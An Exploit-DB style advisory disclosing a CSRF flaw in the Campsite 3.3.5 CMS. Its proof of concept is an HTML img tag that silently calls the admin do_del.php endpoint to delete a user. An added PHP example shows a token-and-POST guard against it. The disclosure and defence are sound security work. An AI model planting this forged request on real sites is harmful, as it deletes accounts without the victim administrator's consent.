
Campsite 3.3.5 - Cross-Site Request Forgery

Author: pratul agrawal
type: webapps
platform: php
port: 
date_added: 2010-03-09 
date_updated:  
verified: 1 
codes: OSVDB-62851 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcampsite-3.3.5.tar.gz

                     =======================================================================

                                         campsite 3.3.5 CSRF Vulnerability

                     =======================================================================

                                                     by

                                                Pratul Agrawal



  # Vulnerability found in- Admin module

  # email         Pratulag@yahoo.com

  # company       aksitservices

  # Credit by     Pratul Agrawal

  # Category  	  CMS / Portals

  # Site p4ge     http://wwwcampware.org/

  # Platform      php



  #  Proof of concept   #

  Targeted URL:  http://server/admin/login.php


  Script to delete the Admin user through Cross Site request forgery

             .  ..................................................................................................................

                        <html>

                          <body>

                           <img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />

                          </body>

                        </html>


             .  ..................................................................................................................



  After execution, refresh the page and you can see that the user with the given ID is deleted automatically.


#If you have any questions, comments, or concerns, feel free to contact me.
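
Added example, not part of the original advisory and not Campsite code: a guard of the kind that stops the forged do_del.php request above, by refusing state changes over GET and requiring a per-session token. The function names csrf_token and reject_reason, the csrf_token form field, and the sample requests are hypothetical; only the User and uType parameters come from the advisory.

```php
<?php
// Added example: hypothetical guard for a state-changing admin endpoint.
// Not Campsite code; names and sample requests are constructed for illustration.

// Issue (or reuse) a per-session anti-CSRF token to embed in the delete form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Return null when the request may proceed, otherwise the reason it is rejected.
function reject_reason(string $method, array $post, array $session): ?string
{
    if ($method !== 'POST') {
        // An <img> tag can only issue GET, so deletes must never be reachable by GET.
        return 'state change requested with ' . $method;
    }
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // Constant-time comparison; an empty session token never matches.
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return 'missing or wrong CSRF token';
    }
    $id = $post['User'] ?? '';
    if (!is_string($id) || !ctype_digit($id)) {
        return 'invalid User id';
    }
    return null;
}

// Constructed requests, run from the CLI. In a real handler, pass
// $_SERVER['REQUEST_METHOD'], $_POST and $_SESSION instead.
$session = [];
$token = csrf_token($session);
$cases = [
    'forged <img> GET'              => ['GET', []],
    'cross-site POST without token' => ['POST', ['User' => '7', 'uType' => 'Staff']],
    'admin form POST with token'    => ['POST', ['User' => '7', 'uType' => 'Staff', 'csrf_token' => $token]],
];
foreach ($cases as $name => [$method, $post]) {
    $why = reject_reason($method, $post, $session);
    printf("%-32s %s\n", $name, $why === null ? 'allowed' : "rejected ($why)");
}
```

Setting the session cookie's SameSite attribute to Lax or Strict adds a second layer, since the browser then withholds the cookie from cross-site subresource requests such as the image load.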